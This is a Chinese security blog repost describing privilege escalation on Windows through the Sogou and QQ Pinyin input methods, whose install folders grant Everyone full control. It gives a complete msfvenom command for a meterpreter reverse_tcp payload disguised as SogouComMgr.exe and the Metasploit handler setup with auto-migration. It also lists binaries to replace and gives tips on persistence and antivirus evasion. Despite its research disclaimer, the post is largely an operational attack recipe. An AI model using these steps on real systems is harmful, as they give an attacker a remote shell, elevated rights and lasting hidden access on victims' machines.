安全攻防 | 利用QQ和搜狗输入法进行权限提升

admin
admin
admin
140416
文章
117
评论
2021年5月20日01:03:43评论288 views字数 2664阅读8分52秒阅读模式
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


0x01 前言

搜狗拼音输入法是目前国内使用人数最多的一款,但仍然会存在一些安全问题,在安装过程中默认给了Everyone完全控制权限,Everyone为所有用户,也就是说我们可以对搜狗拼音输入法安装目录下的任何文件进行修改/删除和写入,所以能达到我们权限提升的目的。

虽然这种提权方式有些年头了,但不知道为什么搜狗一直没有修复这个问题。

0x02 测试环境

操作系统:Windows Server 2016 Datacenter软件版本:搜狗拼音输入法 9.5.0.3517QQ拼音输入法6.4.5804.400搜狗拼音默认安装路径:C:Program Files (x86)SogouInputQQ拼音默认安装路径:C:Program Files (x86)TencentQQPinyin搜狗、QQ输入法进程名:SGTool.exeSGDownload.exepinyinup.exeSogouCloud.exeSogouComMgr.exeSGRender.exeQQPYUserCenter.exeQQPYLiveUp.exeQQPYConfig.exeQQPYToolbox.exeQQPYCloud.exe......
安全攻防 | 利用QQ和搜狗输入法进行权限提升


0x03 搜狗拼音输入法

使用tasklist /svc命令查看搜狗相关进程,或者直接跳转%ProgramFiles(x86)%目录下看是否安装的有搜狗输入法
安全攻防 | 利用QQ和搜狗输入法进行权限提升

接着再用icacls命令查看搜狗输入法安装目录C:Program Files (x86)SogouInput9.5.0.3517的权限配置。

安全攻防 | 利用QQ和搜狗输入法进行权限提升

官方文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753525(v=ws.11)
安全攻防 | 利用QQ和搜狗输入法进行权限提升

确定搜狗输入法安装目录具备Everyone完全控制权限后就可以生成MSF攻击载荷并设置好相关参数执行监听,然后替换目标机器常用的搜狗相关文件,等管理员使用搜狗输入法时运行到我们替换的文件即可得到会话。
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.120 lport=443 -f exe > /var/www/html/SogouComMgr.exe
msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lhost 192.168.0.120msf5 exploit(multi/handler) > set lport 443msf5 exploit(multi/handler) > set autorunscript post/windows/manage/migrate NAME=notepad.exemsf5 exploit(multi/handler) > exploit


其它搜狗拼音输入法可替换文件:

搜狗输入法 - 属性设置工具:%ProgramFiles(x86)%SogouInput9.5.0.3517SGTool.exe 搜狗输入法 - 修复更新工具:%ProgramFiles(x86)%SogouInput9.5.0.3517SGDownload.exe搜狗输入法 - 网络更新程序:%ProgramFiles(x86)%SogouInput9.5.0.3517pinyinup.exe搜狗输入法 - 云计算代理:%ProgramFiles(x86)%SogouInput9.5.0.3517SogouCloud.exe搜狗输入法 - 云计算代理:%ProgramFiles(x86)%SogouInput9.5.0.3517SearchCand.dll搜狗输入法 - 工具箱:%ProgramFiles(x86)%SogouInputComponentsSogouComMgr.exe搜狗输入法 - 用户登录:%ProgramFiles(x86)%SogouInputComponentsSGRender1.0.0.56SGRender.exe
安全攻防 | 利用QQ和搜狗输入法进行权限提升
安全攻防 | 利用QQ和搜狗输入法进行权限提升

安全攻防 | 利用QQ和搜狗输入法进行权限提升


0x04 QQ拼音输入法

QQ拼音个人中心QQPYUserCenter.exe被我们替换后直接切换到QQ拼音输入法即可得到Meterpreter会话,其它文件可能还得等管理员执行相应操作后才能得到会话。
QQ拼音输入法 - 个人中心:
%ProgramFiles(x86)%TencentQQPinyin6.4.5804.400QQPYUserCenter.exeQQ拼音输入法 - 升级工具:%ProgramFiles(x86)%TencentQQPinyin6.4.5804.400QQPYLiveUp.exeQQ拼音输入法 - 属性设置:%ProgramFiles(x86)%TencentQQPinyin6.4.5804.400QQPYConfig.exeQQ拼音输入法 - 工具箱:%ProgramFiles(x86)%TencentQQPinyin6.4.5804.400QQPYToolbox.exeQQ拼音云输入 - 客户端:%ProgramFiles(x86)%TencentQQPinyin6.4.5804.400QQPYCloud.exe
安全攻防 | 利用QQ和搜狗输入法进行权限提升
安全攻防 | 利用QQ和搜狗输入法进行权限提升


0x05 注意事项

  1. 如果目标机器为XP、2003系统的话我们就可以直接利用lpk.dll劫持来进行权限提升可能会更好;
  2. 替换文件前要先备份好我们要替换的搜狗拼音输入法相关文件,便于我们后期将其恢复到原始状态;
  3. 最终获取的Meterpreter会话权限取决于目标服务器登录的是哪个用户来执行我们的搜狗拼音输入法;

  4. 同时也可以利用目标机器上的搜狗、QQ等输入法来进行权限维持,有安全防护还得自己做下免杀处理;

  5. 防止替换后的文件在运行后就退出而导致Meterpreter会话断开,笔者建议用migrate模块注入到其它进程中运行;

本文始发于微信公众号(贝塔安全实验室):安全攻防 | 利用QQ和搜狗输入法进行权限提升

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月20日01:03:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   安全攻防 | 利用QQ和搜狗输入法进行权限提升https://cn-sec.com/archives/377421.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息